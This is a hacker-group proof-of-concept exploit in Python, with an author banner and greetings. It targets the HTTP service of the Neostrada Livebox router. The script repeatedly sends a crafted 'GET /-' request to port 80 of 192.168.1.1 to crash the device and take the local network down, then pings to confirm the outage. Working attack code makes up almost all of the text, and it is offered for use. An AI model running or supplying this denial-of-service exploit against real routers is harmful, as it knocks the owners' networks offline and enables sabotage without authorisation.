|
# Neostrada Livebox Router Remote Network Down PoC Exploit
# Author: 0in aka zer0in from Dark-Coders Group!
# Contact: 0in.email(at)gmail.com / 0in(at)dark-coders.pl
# Site: http://dark-coders.pl
# Greetings to: All Dark-Coders Members: die,doctor,m4r1usz,sun8hclf ;*
# Friends: cOndemned,joker,chomzee,TBH
# IRC: #dark-coders & #pvt
# Description:
# When we send a "specially crafted http packet" x ~25
# Livebox HTTP service && all network goes down
# Simple PoC source:
#!/usr/bin/python
from socket import *
import os
import sys
target = "192.168.1.1"
def to_vuln(ip):
suck = socket(AF_INET,SOCK_STREAM,0)
try:
conn = suck.connect((ip,80))
except Exception:
check(ip)
return suck
def check(ip):
print "[+] No HTTP response..."
print "[+] Server and network should go down!"
print "[+] Check it with ping..."
os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!] [HTTP DoS vuln] "
print "[!] by 0in [0in.email(at)gmail.com] "
print "\n[+] Dosing..."
for i in range(256):
pack3t = "GET /- HTTP/1.1\r\n\r\n"
POC = to_vuln(target)
POC.send(pack3t)
try:
POC.recv(512)
except Exception:
check(target)